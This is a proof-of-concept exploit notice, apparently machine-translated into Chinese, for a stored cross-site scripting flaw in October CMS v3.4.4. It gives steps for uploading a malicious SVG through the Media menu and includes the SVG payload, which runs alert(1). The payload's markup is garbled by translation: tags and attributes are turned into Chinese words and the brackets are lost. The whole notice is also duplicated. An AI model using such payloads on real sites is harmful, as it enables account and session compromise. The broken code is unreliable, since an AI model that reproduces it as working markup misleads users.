#Exploit Title: 10月CMS v3.4.4-存储的跨站点脚本(XSS)(认证)
#Date: 2023年6月29日
#Exploit作者: Okan Kurtulus
#Dendor HomePage: https://octobercms.com
#版本: v3.4.4
#Tested ON: Ubuntu 22.04
#cve : n/a
#概念证明:
1 - 通过网站安装系统,并与任何具有文件上传授权的用户登录。
2 - 在顶部菜单中选择“媒体”。使用下面的有效负载准备SVG文件。
3 - 上传SVG文件并从其目录中调用相关文件。将触发XSS。
#Stored XSS Payload:
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(1);
/脚本
/svg
#Date: 2023年6月29日
#Exploit作者: Okan Kurtulus
#Dendor HomePage: https://octobercms.com
#版本: v3.4.4
#Tested ON: Ubuntu 22.04
#cve : n/a
#概念证明:
1 - 通过网站安装系统,并与任何具有文件上传授权的用户登录。
2 - 在顶部菜单中选择“媒体”。使用下面的有效负载准备SVG文件。
3 - 上传SVG文件并从其目录中调用相关文件。将触发XSS。
#Stored XSS Payload:
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(1);
/脚本
/svg